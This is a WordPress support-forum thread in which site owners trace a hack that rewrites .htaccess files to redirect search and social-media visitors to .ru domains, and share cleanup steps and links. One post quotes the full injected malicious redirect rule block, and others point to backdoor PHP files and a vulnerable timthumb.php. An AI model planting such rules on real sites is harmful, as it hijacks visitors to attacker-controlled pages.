Was our website hacked? PLEASE HELP!
-
For some of our posts on our page (www.Metszilla.com), when we go to click on the link in order to read the full post, we get sent to this address (https://uaroyalysdaliachu.ru/industry/index.php) and an error message pops up.
Same thing happens when we upload the link to facebook and you try to navigate from facebook to our page, it sends you right to https://uaroyalysdaliachu.ru/industry/index.php
PLEASE HELP!
-
OK guys, finally got it fixed but it was a painful process. In short, you have to restore your blog, but I’ll post exactly what we did from start to finish:
*Temporarily fixed the issue by going into our cpanel file manger and editing our hd access file. I would think this is different for every hosting service so my advice would be to call your hosting company and have them take a look at the file.
*After the temp fix acted up I restored the blog. I first backed up the blog creating a new file. After backing up the site to an earlier date; in our case I chose jan 29th. After it was fixed — I went to google search to make sure — I then went into our cpanel and deleted the file I backed up.
Any news about this hacking attack?
same here. first it was inserting in to .htaccess files https://daliachu-uaroyalys.ru/industry/index.php now it’s adding https://uaroyalysdaliachu.ru/industry/index.php
I cleaned my PC
completely re-installed all WP blogs
set 444 attributes to all .htaccess filesbut in 10 mutes it happened again. It’s like catching the wind …
welpix wrote:
set 444 attributes to all .htaccess files
but in 10 mutes it happened again. It’s like catching the wind …
If they are rewriting/overwriting your .htaccess files then they may have server access. Have you checked your FTP/SFTP logs?
Yep. They add this code to the htacces file :
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ https://bannortimqimulta.ru/industry/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ https://bannortimqimulta.ru/industry/index.php [R=301,L] </IfModule>
And they change the htaccess permissions to 444 instead of 604. What can we do?
Okey guys, i have same problem so far…
Nothing helpsBTW: not only wordpress was hacked, i have websites on DLE and Livestreet, they also have that htaccess annoying replacing. SO ITS NOT WordPress vulnerability!
If i could only trace what script editing htaccess, maybe some kind of server logs?
Same issue here (with WP sites).
Looking around I found a bunch of .php files. I think it’s these files which are re-filling the .htaccess files with all the redirection junk.
For me, the dodgy .php files were found in various subfolders within wp-content/uploads.
I’ve weeded out all the files, changed all user passwords, ftp passwords and db passwords. I’ve installed BulletPoint, though I don’t know how much that’ll help (before I found all the dodgy files my .htaccess file was still getting overwritten, even with BulletPoint active).
Before, my .htacesss files were being overwritten within 15-20 mins of me clearing out the garbage. Now, it’s been 2 hours and everything is still OK – touch wood.
HTH.
I have re-installed clean 4 out of my 10 blogs about 14 hours ago. They are clean so far. What did differently is I used only limited number of plugins. My suspicion is that anything beyond these may be causing it.
all-in-one-seo-pack
google-sitemap-generator
woocommerce
wp-super-cache
contact-form-7
widget-contextHOLD ON I GOT IT!!!
CHECK YOUR WORDPRESS THEME FOR NEXT FILES AND DIRS:
/inc.php
/timthumb.php
/cache/ (with a lot of external_1f3d51de6d5f7b7e7fca0af8a635a413.php)If some of your site got this shit, so this is the place where malware comes from.
Just rename (add some symbols in name of file) this files and clean your htaccess files, i suppose all will be well.timthumb.php has vulnerability!
More information:
https://www.claudiokuenzler.com/blog/206/another-timthumb-wordpress-hack-external-upload-httpd-processnone of those were in mine, but there is one good article about it as well https://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html
Rewiaca- Did renaming those files fix the issue permanently (or thus far) for you?
I just started getting this these this morning, have tried to replace .htaccess files only to have them rewritten 10 minutes later. Has anything actually worked permanently for anyone?
Trying to avoid doing a complete re-install for the 20+ sites I have hosted if it’s not WordPress’ vulnerability.
Just curious…what web host is everyone using? I use BlueHost.
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://www.ads-software.com/support/topic/268083#post-1065779
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://ottopress.com/2009/hacked-wordpress-backdoors/Just renaming files will not solve the problem. You have to be very aggressive in cleaning and replacing files. Follow the instructions in the above links and check out the other links folks have posted here. Notify your host. I you have problems it is likely that everyone on the server has problems.
When clean follow this https://codex.www.ads-software.com/Hardening_WordPress.
If you are unable to do it yourself there are sites like https://sitecheck.sucuri.net that will do it for you.
+1 for sucuri.net.
After grappling with the problem myself for the best part of a day, I threw in the towel and signed-up for their $190/yr plan. They sorted the problem out on all my sites and now continuously monitor/scan every few hours for anything unusual.
If you’re running a commercial / mission critical site you might want to consider using them, if for nothing else than piece of mind.
(No affiliation, just a recommendation).
All, we’ve found a working fix to this problem. See the whole post here and follow my directions which are more secure that some that others are offering.
https://www.ads-software.com/support/topic/i-have-been-well-and-truly-hacked?replies=46#post-2642987
- The topic ‘Was our website hacked? PLEASE HELP!’ is closed to new replies.